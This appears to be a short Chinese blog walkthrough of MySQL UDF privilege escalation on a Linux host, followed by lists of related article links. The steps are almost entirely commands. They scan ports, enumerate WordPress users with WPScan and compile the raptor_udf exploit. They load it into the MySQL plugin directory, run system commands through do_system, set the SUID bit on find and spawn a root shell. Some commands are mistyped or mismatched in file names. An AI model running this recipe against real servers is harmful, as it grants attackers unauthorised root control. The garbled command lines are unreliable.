mysql提權
Namp 掃描ip端口
Cms 探測 wpscan kali 工具
Wpscan 掃描出來用戶名。用用戶名登陸ssh
而後利用mysql UDF提權。html
1.gcc -g -c raptor_udf.c 編譯一下下載的c文件
2.gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
3.登陸mysql
4.Create table foo(line blob);
5.scp raptor_udf2.so michael@192.168.111.136:/var/www/html/wordpress/
6.第五步是用來傳遞文件到目標服務器上的
7.Insertintofoovalues(load_file('/var/www/html/wordpress/raptor_udf5.so'));
8.select * from foo into dumpfile '/usr/lib/mysql/plugin/aaa.so';
9.create function do_system returns integer soname 'aaa.so';
10.select do_system('id > /tmp/out; chown michael.michael /tmp/out');
11.!Sh
12.cat /tmp/out
13.加載 select do_system('chmod u+s /usr/bin/find');
14.而後推出mysql 直接用mysql
touch foosql
find foo -exec 'whoami' ;
find foo -exec 'id' ;
find foo -exec '/bin/sh' ;服務器
就是root權限ssh
- 1. MySQL提權篇
- 2. MYSQL-提權
- 3. [提權]mysql中的UDF提權
- 4. Mysql udf /Mix 提權
- 5. MYSQL提權方法
- 6. linux mysql udf 提權
- 7. mysql grant提示無權限
- 8. MySQL利用日誌提權
- 9. Mysql udf提權(Linux平臺)
- 10. Mysql數據庫—UDF提權
- 更多相關文章...
- • MySQL用戶授權(GRANT) - MySQL教程
- • Rust 所有權 - RUST 教程
- • 漫談MySQL的鎖機制
- • SpringBoot中properties文件不能自動提示解決方法
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. MySQL提權篇
- 2. MYSQL-提權
- 3. [提權]mysql中的UDF提權
- 4. Mysql udf /Mix 提權
- 5. MYSQL提權方法
- 6. linux mysql udf 提權
- 7. mysql grant提示無權限
- 8. MySQL利用日誌提權
- 9. Mysql udf提權(Linux平臺)
- 10. Mysql數據庫—UDF提權